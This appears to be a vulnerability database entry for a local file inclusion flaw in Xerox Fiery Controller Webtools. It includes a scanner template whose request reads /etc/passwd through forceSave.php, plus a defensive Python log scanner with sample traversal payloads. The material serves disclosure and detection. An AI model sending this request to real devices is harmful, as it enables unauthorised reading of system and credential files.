xerox-efi-lfi: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion

Date: 2025-08-01 | Affected software: Xerox DC260 EFI Fiery Controller Webtools | PoC: public

Vulnerability description

Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed through the 'file' GET parameter of the 'forceSave.php' script is not properly sanitized before being used to read files. An unauthenticated attacker can exploit this to read arbitrary files on the affected system.

PoC code [public]

id: xerox-efi-lfi

info:
  name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion
  author: gy741
  severity: high
  description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
    - https://packetstormsecurity.com/files/145570
    - https://www.exploit-db.com/exploits/43398/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: iot,xerox,disclosure,lfi,packetstorm,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022008b9dccf6e67985cec74f961c27f480bde6e053f6211d3db7e8f94098a6fc77802203fe2f5b8cdd9f5b228d9f535c6386a68a2db3dd0a57e83f509c6b2860169eb9b:922c64590222798bb761d5b6d8e72950
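
For the defender side of the request shown above, the following added example (not part of the original entry or of the template) scans web access logs for `forceSave.php` requests whose `file` parameter resolves to an absolute path or a traversal sequence, including percent-encoded and double-encoded forms. It assumes combined-format log lines from a proxy or web server in front of the controller and that legitimate `file` values are bare relative names; the log lines, IP addresses and the name `job_0042.pdf` are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Client IP, request target and status from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e), at most max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_file_param(value):
    """Return a reason if the value points outside a download directory, else None."""
    path = fully_decode(value).replace("\\", "/")
    if "\x00" in path:
        return "null byte"
    if path.startswith("/"):
        return "absolute path"
    if ".." in path.split("/"):
        return "directory traversal"
    return None

def scan(lines):
    """Return (ip, status, reason, decoded_value) for each suspicious forceSave.php hit."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/forcesave.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            reason = suspicious_file_param(value)
            if reason:
                findings.append((m["ip"], m["status"], reason, fully_decode(value)))
    return findings

# Constructed sample log lines (documentation IP ranges, hypothetical file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2025:10:00:00 +0000] "GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1" 200 1532 "-" "-"',
    '192.0.2.11 - - [01/Aug/2025:10:00:05 +0000] "GET /wt3/forceSave.php?file=job_0042.pdf HTTP/1.1" 200 88211 "-" "-"',
    '198.51.100.7 - - [01/Aug/2025:10:00:09 +0000] "GET /wt3/forceSave.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 403 0 "-" "-"',
    '192.0.2.11 - - [01/Aug/2025:10:00:12 +0000] "GET /wt3/index.php HTTP/1.1" 200 512 "-" "-"',
]
```

A finding with status 200 is the one to triage first, since the template's own matcher treats a 200 response containing a `root:` passwd entry as confirmation of a successful read.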
